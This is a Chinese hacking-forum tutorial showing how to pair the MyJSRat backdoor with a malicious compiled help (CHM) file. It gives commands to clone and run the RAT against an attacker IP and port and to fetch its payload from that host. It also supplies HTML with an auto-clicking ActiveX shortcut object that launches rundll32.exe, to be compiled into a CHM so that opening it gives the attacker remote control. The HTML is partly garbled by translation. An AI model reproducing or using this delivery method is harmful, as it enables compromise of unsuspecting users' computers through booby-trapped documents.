H

MyJSRat结合CHM命令执行

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%

MyJSRat结合CHM命令执行​

MyJSRat​

myjsrat是jsbackdoor的Python版本
下载地址:https://github.com/ridter/myjsrat

Easy CHM​

CHM是用英语编译的帮助手册的缩写,即“编译帮助文件”。 CHM是微软的新一代帮助文件格式。它使用html作为源文本来编译和存储类似数据库的形式的帮助内容。

步骤​

下载 MyJSRat 并运行​

1
git克隆https://github.com/ridter/myjsrat
1
python myjsrat.py -i ipaddr -p端口
20190728170038.png-water_print

下载 wtf 文件​

浏览器访问https://IPADDR:PORT/WTF并将其保存到TXT文件
20190728170053.png-water_print

将上面保存的代码写入到如下代码的 Item1 的 Value 值中​

注意:要在rundll32.exe之前和之后添加,
1
!doctype htmlhtmlheadtitlemousejack重播/title head/headbodyCommand exec obsec id=x classID='clSID3:ADB880A6-d8ff-11cf-9377-00aaaaaaaa 00aaaaaaaaaaaaa 003b7a11'width value='bitmap3:shortcut'param name='item1'value=',rundll32.exe,'param name='item2'value='273,1,1'/objectscriptx.click()
20190728170128.png-water_print

保存为 HTML 文件​

创建一个新目录,然后将上述代码保存在新文件夹中

通过 EasyCHM 制作 CHM 文件​

compile exp.html文件通过Easychm
20190728170140.png-water_print

20190728170151.png-water_print

双击上线​

此时,只需双击test.chm文件,您就可以在线上
20190728170201.png-water_print
 
后退
顶部